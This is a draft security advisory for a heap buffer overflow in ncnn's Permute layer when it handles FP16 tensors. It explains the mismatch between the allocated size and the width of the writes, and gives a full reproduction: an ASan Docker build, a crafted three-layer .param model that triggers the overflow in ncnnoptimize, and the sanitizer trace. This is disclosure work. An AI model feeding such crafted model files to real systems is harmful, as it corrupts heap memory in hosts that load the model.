All advisories
Draft

Heap Buffer Overflow in FP16 Permute

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow in FP16 Permute

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/permute.cpp:59 in Permute::forward
Sanitizer verdict: heap-buffer-overflow

Summary

A crafted .param file routes a 2-D FP16 tensor into a transposing Permute, and ncnn writes twice as many bytes as it allocated. Permute::forward sizes the output with the input's elemsize (2 bytes for FP16) but then accesses the destination through a float* and writes one 4-byte word per element. Any host that runs shape inference or inference on the model — ncnnoptimize in the PoC — gets a heap overflow of roughly the size of the tensor itself.

Detail

Permute::load_param reads only order_type = pd.get(0, 0);. The element size comes from the incoming blob, and a Cast layer with 0=1 1=2 (float32 to float16) is enough to make it 2. Permute::forward captures size_t elemsize = bottom_blob.elemsize; at line 27 and uses it for the allocation, then hardcodes float for the data movement:

// src/layer/permute.cpp:47
        if (order_type == 1)
        {
            top_blob.create(h, w, elemsize, opt.blob_allocator);
            if (top_blob.empty())
                return -100;

            float* outptr = top_blob;

            for (int i = 0; i < w; i++)
            {
                for (int j = 0; j < h; j++)
                {
                    *outptr++ = bottom_blob.row(j)[i];
                }
            }
        }

top_blob.create(h, w, elemsize, ...) reserves h * w * elemsize bytes — 2 bytes per element — but float* outptr advances 4 bytes per iteration and the loop runs w * h times. bottom_blob.row(j) likewise returns a float* into a 2-byte-per-element source, so the read side over-reads in the same way. There is no elemsize == 4 guard on this branch and no FP16 variant of the 2-D transpose; the generic path simply assumes 32-bit elements.

The PoC's 8x8 tensor makes w = h = 8. The allocation is 8 * 8 * 2 = 128 bytes, reported by ASan as a 196-byte region once ncnn's allocation padding is included, while the loop writes 64 * 4 = 256 bytes. The write goes out of bounds once outptr passes the 196-byte mark — at element 49 — and continues for the remaining iterations. Scaling the tensor scales the overflow proportionally.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-fp16-permute && cd ncnn-poc-heap-buffer-overflow-in-fp16-permute

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
3 3
Input data 0 1 data 0=8 1=8
Cast cast 1 1 data cast 0=1 1=2
Permute perm 1 1 cast out 0=1
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x512000000584 at pc 0x64ec9ad95213 bp 0x7ffe3e6a7370 sp 0x7ffe3e6a7360
WRITE of size 4 at 0x512000000584 thread T0
    #0 0x64ec9ad95212 in ncnn::Permute::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/permute.cpp:59
    #1 0x64ec95a55f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #2 0x64ec95a47b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #3 0x64ec95aa79e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #4 0x64ec959393c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #5 0x64ec959b6eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #6 0x716803cd31c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x716803cd328a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x64ec95936624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x512000000584 is located 0 bytes after 196-byte region [0x5120000004c0,0x512000000584)
allocated by thread T0 here:
    #0 0x71680434cf1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x64ec959cb68e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x64ec959cb68e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x64ec95a069c2 in ncnn::Mat::create(int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:371
    #4 0x64ec9ad94f56 in ncnn::Permute::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/permute.cpp:49
    #5 0x64ec95a55f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #6 0x64ec95a47b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x64ec95aa79e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x64ec959393c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x64ec959b6eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x716803cd31c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x716803cd328a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x64ec95936624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/permute.cpp:59 in ncnn::Permute::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const

Credit

Zheng Yu @ DepthFirst